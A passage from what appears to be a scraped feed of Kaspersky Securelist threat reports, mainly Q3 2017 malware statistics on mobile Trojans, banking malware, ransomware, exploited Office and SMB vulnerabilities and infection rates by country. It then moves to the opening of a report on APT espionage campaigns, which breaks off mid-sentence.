Trojan.AndroidOS.Hiddad.ci | 1.47 \n19 | Trojan-Banker.AndroidOS.Asacub.ar | 1.41 \n20 | Trojan.AndroidOS.Agent.eb | 1.29 \n \n_* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab's mobile security product that were attacked._\n\nFirst place was occupied by DangerousObject.Multi.Generic (67.14%), the verdict used for malicious programs detected using cloud technologies. This is basically how the very latest malware is detected.\n\nAs in the previous quarter, Trojan.AndroidOS.Boogr.gsh (7.52%) came second. This verdict is issued for files recognized as malicious by our system based on machine learning.\n\nTrojan.AndroidOS.Hiddad.an (4.56%) was third. The main purpose of this Trojan is to open and click advertising links received from the C&C. The Trojan requests administrator rights to prevent its removal.\n\nTrojan-Dropper.AndroidOS.Agent.hb (2.96%) climbed from sixth in Q2 to fourth this quarter. This Trojan decrypts and runs another Trojan \u2013 a representative of the Loaipi family. One of them \u2013Trojan.AndroidOS.Loapi.b \u2013 came fifth in this quarter's Top 20. This is a complex modular Trojan whose main malicious component needs to be downloaded from the cybercriminals' server. We can assume that Trojan.AndroidOS.Loapi.b is designed to steal money via paid subscriptions.\n\nTrojan-Dropper.AndroidOS.Hqwar.i (3.59%), the verdict used for Trojans protected by a certain packer/obfuscator, fell from fourth to sixth. In most cases, this name indicates representatives of the [FakeToken ](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Faketoken>)and [Svpeng ](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Svpeng>)mobile banking families.\n\nIn seventh was Trojan-Clicker.AndroidOS.Ubsod.b, a small basic Trojan that receives links from a C&C and opens them. We wrote about this family in more detail in our [review of Trojans](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) that steal money using WAP subscriptions.\n\nTrojan Backdoor.AndroidOS.Ztorg.c came eighth. This is one of the most active advertising Trojans that uses superuser rights. In the third quarter of 2017, our Top 20 included eight Trojans that try to obtain or use root rights and which make use of advertising as their main means of monetization. Their goal is to deliver ads to the user more aggressively, applying (among other methods) hidden installation of new advertising programs. At the same time, superuser privileges help them 'hide' in the system folder, making it very difficult to remove them. It's worth noting that the quantity of this type of malware in the Top 20 has been decreasing (in Q1 2017, there were 14 of these Trojans in the rating, while in Q2 the number was 11).\n\nTrojan.AndroidOS.Agent.gp (2.05%), which steals money from users making calls to premium numbers, rose from fifteenth to ninth. Due to its use of administrator rights, it resists attempts to remove it from an infected device.\n\nOccupying fifteenth this quarter was Trojan-Ransom.AndroidOS.Zebt.a, the first ransom Trojan in this Top 20 rating in 2017. This is a fairly simple Trojan whose main goal is to block the device with its window and demand a ransom. Zebt.a tends to attack users in Europe and Mexico.\n\nTrojan.AndroidOS.Hiddad.an (1.48%) fell to sixteenth after occupying second and third in the previous two quarters. This piece of malware imitates various popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to withstand removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts. Its main 'audience' is in Russia.\n\n#### The geography of mobile threats\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-5-en.jpg>)\n\nThe geography of attempted mobile malware infections in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile malware (ranked by percentage of users attacked):**\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Iran | 35.12 \n2 | Bangladesh | 28.30 \n3 | China | 27.38 \n4 | C\u00f4te d'Ivoire | 26.22 \n5 | Algeria | 24.78 \n6 | Nigeria | 23.76 \n7 | Indonesia | 22.29 \n8 | India | 21.91 \n9 | Nepal | 20.78 \n10 | Kenya | 20.43 \n \n_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000). \n** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab's mobile security product in the country._\n\nFor the third quarter in a row Iran was the country with the highest percentage of users attacked by mobile malware \u2013 35.12%. Bangladesh came second, with 28.3% of users there encountering a mobile threat at least once during Q3. China (27.38%) followed in third.\n\nRussia (8.68%) came 35th this quarter (vs 26th place in Q2), France (4.9%) was 59th, the US (3.8%) 67th, Italy (5.3%) 56th, Germany (2.9%) 79th, and the UK (3.4%) 72nd.\n\nThe safest countries were Georgia (2.2%), Denmark (1.9%), and Japan (0.8%).\n\n#### Mobile banking Trojans\n\nOver the reporting period we detected 19,748 installation packages for mobile banking Trojans, which is 1.4 times less than in Q2 2017.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-6-en.jpg>)\n\nNumber of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q4 2016 \u2013 Q3 2017)\n\nBanker.AndroidOS.Asacub.ar became the most popular mobile banking Trojan in Q3, replacing the long-term leader Trojan-Banker.AndroidOS.Svpeng.q. These mobile banking Trojans use phishing windows to steal credit card data and logins and passwords for online banking accounts. In addition, they steal money via SMS services, including mobile banking.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-7-en.jpg>)\n\nGeography of mobile banking threats in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked):**\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Russia | 1.20 \n2 | Uzbekistan | 0.40 \n3 | Kazakhstan | 0.36 \n4 | Tajikistan | 0.35 \n5 | Turkey | 0.34 \n6 | Moldova | 0.31 \n7 | Ukraine | 0.29 \n8 | Kyrgyzstan | 0.27 \n9 | Belarus | 0.26 \n10 | Latvia | 0.23 \n \n_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000). \n** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab's mobile security product in the country._\n\nIn Q3 2017, the Top 10 countries attacked by mobile banker Trojans saw little change: Russia (1.2%) topped the ranking again. In second and third places were Uzbekistan (0.4%) and Kazakhstan (0.36%), which came fifth and tenth respectively in the previous quarter. In these countries the Faketoken.z, Tiny.b and Svpeng.y families were the most widespread threats.\n\nOf particular interest is the fact that Australia, a long-term resident at the top end of this rating, didn't make it into our Top 10 this quarter. This was due to a decrease in activity by the [Trojan-Banker.AndroidOS.Acecard](<https://securelist.com/the-evolution-of-acecard/73777/>) and Trojan-Banker.AndroidOS.Marcher mobile banking families.\n\n#### Mobile ransomware\n\nIn Q3 2017, we detected 108,073 mobile Trojan-Ransomware installation packages, which is almost half as much as in the previous quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-8-en.jpg>)\n\nNumber of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q3 2016 \u2013 Q3 2017)\n\nIn our report for Q2, [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that in the first half of 2017, we had discovered more mobile ransomware installation packages than in any other period. The reason was the Trojan-Ransom.AndroidOS.Congur family. However, in the third quarter of this year we observed a decline in this family's activity.\n\nTrojan-Ransom.AndroidOS.Zebt.a became the most popular mobile Trojan-Ransomware in Q3, accounting for more than a third of users attacked by mobile ransomware. Second came Trojan-Ransom.AndroidOS.Svpeng.ab. Meanwhile, [Trojan-Ransom.AndroidOS.Fusob.h](<https://securelist.com/mobile-malware-evolution-2015/73839/>), which topped the rating for several quarters in a row, was only third in Q3 2017.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-9-en.jpg>)\n\nGeography of mobile Trojan-Ransomware in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked):**\n\n1 | US | 1.03% \n---|---|--- \n2 | Mexico | 0.91% \n3 | Belgium | 0.85% \n4 | Kazakhstan | 0.79% \n5 | Romania | 0.70% \n6 | Italy | 0.50% \n7 | China | 0.49% \n8 | Poland | 0.49% \n9 | Austria | 0.45% \n10 | Spain | 0.33% \n \n_* We eliminated countries from this ranking where the number of users of Kaspersky Lab's mobile security product is lower than 10,000. \n** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab's mobile security product in the country._\n\nThe US (1.03%) again topped the rating of countries attacked most by mobile Trojan-Ransomware; the most widespread family in the country was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of about $500 from victims to unblock their devices.\n\nIn Mexico (0.91%), which came second in Q3 2017, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Zebt.a. Belgium (0.85%) came third, with Zebt.a the main threat to users there too.\n\n## Vulnerable apps exploited by cybercriminals\n\nQ3 2017 saw continued growth in the number of attacks launched against users involving malicious Microsoft Office documents. We noted the emergence of a large number of combined documents containing an exploit as well as a phishing message \u2013 in case the embedded exploit fails.\n\nAlthough two new Microsoft Office vulnerabilities, CVE-2017-8570 and CVE-2017-8759, have emerged, cybercriminals have continued to exploit CVE-2017-0199, a logical vulnerability in processing HTA objects that was discovered in March 2017. Kaspersky Lab statistics show that attacks against 65% users in Q3 exploited CVE-2017-0199, and less than 1% exploited CVE-2017-8570 or CVE-2017-8759. The overall share of exploits for Microsoft Office was 27.8%.\n\nThere were no large network attacks (such as [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) or [ExPetr](<https://securelist.com/from-blackenergy-to-expetr/78937/>)) launched in Q3 using vulnerabilities patched by the MS17-010 update. However, according to KSN data, there was major growth throughout the quarter in the number of attempted exploitations of these vulnerabilities that were blocked by our Intrusion Detection System component. Unsurprisingly, the most popular exploits have been EternalBlue and its modifications, which use an SMB protocol vulnerability; however, KL statistics show that EternalRomance, EternalChampion and an exploit for the CVE-2017-7269 vulnerability in IIS web servers have also been actively used by cybercriminals. EternalBlue, however, accounts for millions of blocked attempted attacks per month, while the numbers for other exploits are much lower.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-10-en.jpg>)\n\nDistribution of exploits used in attacks by type of application attacked, Q3 2017\n\nThe distribution of exploits by the type of attacked application this quarter was practically the same as in Q2. First place is still occupied by exploits targeting browsers and browser components with a share of 35.0% (a decline of 4 p.p. compared to Q2.) The proportion of exploits targeting Android vulnerabilities (22.7%) was almost identical to that in Q2, placing this type of attacked application once again in third behind Office vulnerabilities.\n\n## Online threats (Web-based attacks)\n\n_These statistics are based on detection verdicts returned by the web antivirus module that protects users at the moment when malicious objects are downloaded from a malicious/infected web page. Malicious sites are specifically created by cybercriminals; infected web resources include those whose content is created by users (e.g. forums), as well as legitimate resources._\n\n### Online threats in the banking sector\n\n_These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. Beginning from the first quarter of 2017 these statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q3 2017, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs capable of stealing money via online banking on 204,388 computers.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-11-en.jpg>)\n\nNumber of users attacked by financial malware, Q3 2017\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-12-en.jpg>)\n\nGeography of banking malware attacks in Q3 2017 (percentage of all users attacked)\n\n**TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)**\n\n| Country* | % of users attacked** \n---|---|--- \n**1** | Togo | 2.30 \n**2** | China | 1.91 \n**3** | Taiwan | 1.65 \n**4** | Indonesia | 1.58 \n**5** | South Korea | 1.56 \n**6** | Germany | 1.53 \n**7** | United Arab Emirates | 1.52 \n**8** | Lebanon | 1.48 \n**9** | Libya | 1.43 \n**10** | Jordan | 1.33 \n \n_These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data. \n* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000). \n** Unique users whose computers have been targeted by banking Trojan malware attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\nThe table below shows the Top 10 malware families used in Q3 2017 to attack online banking users (in terms of percentage of users attacked):\n\n| Name* | % of attacked users** \n---|---|--- \n**1** | Trojan-Spy.Win32.Zbot | 27.9 \n**2** | Trojan.Win32.Nymaim | 20.4 \n**3** | Trojan.Win32.Neurevt | 10.0 \n**4** | Trickster | 9.5 \n**5** | SpyEye | 7.5 \n**6** | Caphaw | 6.3 \n**7** | Trojan-Banker.Win32.Gozi | 2.0 \n**8** | Shiz | 1.8 \n**9** | ZAccess | 1.6 \n**10** | NeutrinoPOS | 1.6 \n \n_* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. \n** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware._\n\nThe malware families Dridex and Tinba lost their places in this quarter's Top 10. One of their former positions was occupied by the Trickster bot (accounting for 9.5% of attacked users), also known as TrickBot, a descendant of the now defunct Dyre banker. There was a small change in the leading three malicious families. First and second places are still occupied by Trojan-Spy.Win32.Zbot (27.9%) and Trojan.Win32.Nymaim (20.4%) respectively, while third place is now occupied by Trojan.Win32.Neurevt (10%) whose share grew by nearly 4 p.p.\n\n### Cryptoware programs\n\n#### Q3 highlights\n\n##### Crysis rises from the dead\n\nIn our Q2 report [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that the cybercriminals behind the Crysis ransomware cryptor halted distribution of the malware and published the secret keys needed to decrypt files. This took place in May 2017, and all propagation of the ransomware was stopped completely at that time.\n\nHowever, nearly three months later, in mid-August, we discovered that this Trojan had come back from the dead and had set out on a new campaign of active propagation. The email addresses used by the blackmailers were different from those used in earlier samples of Crysis. A detailed analysis revealed that the new samples of the Trojan were completely identical to the old ones apart from just one thing \u2013 the public master keys were new. Everything else was the same, including the compilation timestamp in the PE header and, more interestingly, the labels that the Trojan leaves in the service area at the end of each encrypted file. Closer scrutiny of the samples suggests that the new distributors of the malware didn't have the source code, so they just took its old body and used a HEX editor to change the key and the contact email.\n\nThe above suggests that this piece of 'zombie' malware is being spread by a different group of malicious actors rather than its original developer who disclosed all the private keys in May.\n\n##### Surge in Cryrar attacks\n\nThe Cryrar cryptor (aka ACCDFISA) is a veteran among the ransomware Trojans that are currently being spread. It emerged way back in 2012 and has been active ever since. The cryptor is written in PureBasic and uses a legitimate executable RAR archiver file to place the victim's files in password-encrypted RAR-sfx archives.\n\nIn the first week of September 2017 we recorded a dramatic rise in the number of attempted infections with Cryrar \u2013 a surge never seen before or since. The malicious actors used the following approach: they crack the password to RDP by brute force, get authentication on the victim's system using the remote access protocol and manually launch the Trojan's installation file. The latter, in turn, installs the cryptor's body and the components it requires (including the renamed RAR.EXE file), and then automatically launches the cryptor.\n\nAccording to KSN data, this wave of attacks primarily targeted Vietnam, China, the Philippines and Brazil.\n\n##### Master key to original versions of Petya/Mischa/GoldenEye published\n\nIn July 2017, the authors of the [Petya Trojan](<https://securelist.com/petya-the-two-in-one-trojan/74609/>) published their master key, which can be used to decrypt the Salsa keys required to decrypt MFT and unblock access to systems affected by Petya/Mischa or GoldenEye.\n\nThis happened shortly after the [ExPetr epidemic](<https://securelist.com/schroedingers-petya/78870/>) which used part of the GoldenEye code. This suggests that the authors of Petya/Mischa/GoldenEye did so in an attempt to distance themselves from the ExPetr attack and the outcry that it caused.\n\nUnfortunately, this master key won't help those affected by ExPetr, as its creators [didn't include](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>) the option of restoring a Salsa key to decrypt MFT.\n\n#### The number of new modifications\n\nIn Q3 2017, we identified five new ransomware families in this classification. It's worth noting here that this number doesn't include all the Trojans that weren't assigned their own 'personal' verdict. Each quarter, dozens of these malicious programs emerge, though they either have so few distinctive characteristics or occur so rarely that they and the hundreds of others like them remain nameless, and are detected with generic verdicts.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-13-en.jpg>)\n\nNumber of newly created cryptor modifications, Q3 2016 \u2013 Q3 2017\n\nThe number of new cryptor modifications continues to decline compared to previous quarters. This could be a temporary trend, or could indicate that cybercriminals are gradually losing their interest in cryptors as a means of making money, and are switching over to other types of malware.\n\n#### The number of users attacked by ransomware\n\nJuly was the month with the lowest ransomware activity. From July to September, the number of ransomware attacks rose, though it remained lower than May and June when two massive epidemics (WannaCry and ExPetr) struck.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-14-en.jpg>)\n\nNumber of unique users attacked by Trojan-Ransom cryptor malware (Q3 2017)\n\n#### The geography of attacks\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-15-en.jpg>)\n\n#### Top 10 countries attacked by cryptors\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Myanmar | 0.95% \n2 | Vietnam | 0.92% \n3 | Indonesia | 0.69% \n4 | Germany | 0.62% \n5 | China | 0.58% \n6 | Russia | 0.51% \n7 | Philippines | 0.50% \n8 | Venezuela | 0.50% \n9 | Cambodia | 0.50% \n10 | Austria | 0.49% \n \n_* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000) \n** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country._\n\nMost of the countries in this Top 10 are from Asia, including Myanmar (0.95%), a newcomer to the Top 10 that swept into first place in Q3. Vietnam (0.92%) came second, moving up two places from Q2, while China (0.58%) rose one place to fifth.\n\nBrazil, Italy and Japan were the leaders in Q2, but in Q3 they failed to make it into the Top 10. Europe is represented by Germany (0.62%) and Austria (0.49%).\n\nRussia, in tenth the previous quarter, ended Q3 in sixth place.\n\n#### Top 10 most widespread cryptor families\n\n| **Name** | **Verdict*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 16.78% | \n2 | Crypton | Trojan-Ransom.Win32.Cryptoff | 14.41% | \n3 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 6.90% | \n4 | Locky | Trojan-Ransom.Win32.Locky | 6.78% | \n5 | Cerber | Trojan-Ransom.Win32.Zerber | 4.30% | \n6 | Cryrar/ACCDFISA | Trojan-Ransom.Win32.Cryrar | 3.99% | \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.69% | \n8 | Spora | Trojan-Ransom.Win32.Spora | 1.87% | \n9 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.77% | \n10 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 1.27% | \n \n_* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data. \n** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware._\n\nWannacry (16.78%) tops the rating for Q3, and the odds are that it's set to remain there: the worm has been propagating uncontrollably, and there are still huge numbers of computers across the globe with the unpatched vulnerability that Wannacry exploits.\n\nCrypton (14.41%) came second. This cryptor emerged in spring 2016 and has undergone many modifications since. It has also been given multiple names: CryptON, JuicyLemon, PizzaCrypts, Nemesis, x3m, Cry9, Cry128, Cry36.\n\nThe cryptor Purgen (6.90%) rounds off the top three after rising from ninth. The rest of the rating is populated by 'old timers' \u2013 the Trojans Locky, Cerber, Cryrar, Shade, and Spora.\n\nThe Jaff cryptor appeared in the spring of 2017, going straight into fourth place in the Q2 rating, and then stopped spreading just as suddenly.\n\n### Top 10 countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2017, Kaspersky Lab solutions blocked **277,646,376** attacks launched from web resources located in 185 countries around the world. **72,012,219** unique URLs were recognized as malicious by web antivirus components.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-16-en.jpg>)\n\nDistribution of web attack sources by country, Q3 2017\n\nIn Q3 2017, the US (3.86%) was home to most sources of web attacks. The Netherlands (25.22%) remained in second place, while Germany moved up from fifth to third. Finland and Singapore dropped out of the top five and were replaced by Ireland (1.36%) and Ukraine (1.36%).\n\n**Countries where users faced the greatest risk of online infection**\n\nIn order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware_** class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Belarus | 27.35 \n2 | Algeria | 24.23 \n3 | Russia | 23.91 \n4 | Armenia | 23.74 \n5 | Moldova | 23.61 \n6 | Greece | 21.48 \n7 | Azerbaijan | 21.14 \n8 | Kyrgyzstan | 20.83 \n9 | Uzbekistan | 20.24 \n10 | Albania | 20.10 \n11 | Ukraine | 19.82 \n12 | Kazakhstan | 19.55 \n13 | France | 18.94 \n14 | Venezuela | 18.68 \n15 | Brazil | 18.01 \n16 | Portugal | 17.93 \n17 | Vietnam | 17.81 \n18 | Tajikistan | 17.63 \n19 | Georgia | 17.50 \n20 | India | 17.43 \n \n_These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data._ \n_* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users). \n** Unique users whose computers have been targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 16.61% of computers connected to the Internet globally were subjected to at least one **Malware-class** web attack during the quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-17-en.jpg>)\n\nGeography of malicious web attacks in Q3 2017 (ranked by percentage of users attacked)\n\nThe countries with the safest online surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%) and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q3 2017, Kaspersky Lab's file antivirus detected **198,228,428** unique malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating of malicious programs only includes **Malware-class** attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Yemen | 56.89 \n2 | Vietnam | 54.32 \n3 | Afghanistan | 53.25 \n4 | Uzbekistan | 53.02 \n5 | Laos | 52.72 \n6 | Tajikistan | 49.72 \n7 | Ethiopia | 48.90 \n8 | Syria | 47.71 \n9 | Myanmar | 46.82 \n10 | Cambodia | 46.69 \n11 | Iraq | 45.79 \n12 | Turkmenistan | 45.47 \n13 | Libya | 45.00 \n14 | Bangladesh | 44.54 \n15 | China | 44.40 \n16 | Sudan | 44.27 \n17 | Mongolia | 44.18 \n18 | Mozambique | 43.84 \n19 | Rwanda | 43.22 \n20 | Belarus | 42.53 \n \n_These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users' computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users). \n** The percentage of unique users in the country with computers that blocked **Malware-class** local threats as a percentage of all unique users of Kaspersky Lab products._\n\nThis Top 20 of countries has not changed much since Q2, with the exception of China (44.40%), Syria (47.71%) and Libya (45.00%) all making an appearance. The proportion of users attacked in Russia amounted to 29.09%.\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat during the third quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-18-en.jpg>)\n\nGeography of local malware attacks in Q3 2017 (ranked by percentage of users attacked)\n\n**The safest countries in terms of local infection risks **included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czechia (7.89%), Ireland (6.86%) and Japan (5.79%).\n\n_All the statistics used in this report were obtained using [Kaspersky Security Network](<https://www.kaspersky.com/images/KESB_Whitepaper_KSN_ENG_final.pdf>) (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity._", "cvss3": {}, "published": "2017-11-10T10:45:04", "type": "securelist", "title": "IT threat evolution Q3 2017. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-7269", "CVE-2017-8570", "CVE-2017-8759"], "modified": "2017-11-10T10:45:04", "href": "https://securelist.com/it-threat-evolution-q3-2017-statistics/83131/", "id": "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-29T10:36:40", "description": "\n\n## Targeted attacks and malware campaigns\n\n### Mobile espionage targeting the Middle East\n\nAt the end of June we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker' involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built an open-source legitimate 'Conversations' messenger that included the malicious code. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).\n\n### APT33 beefs up its toolset\n\nIn July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year \u2013 tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.\n\n### New FinSpy iOS and Android implants found in the wild\n\nWe recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices \u2013 suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.\n\n### Turla revamps its toolset\n\nTurla (aka Venomous Bear, Uroboros and Waterbug), a high profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new.NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more [here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).\n\n### CloudAtlas uses new infection chain\n\n[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates \u2013 whitelisted per victim \u2013 hosted on remote 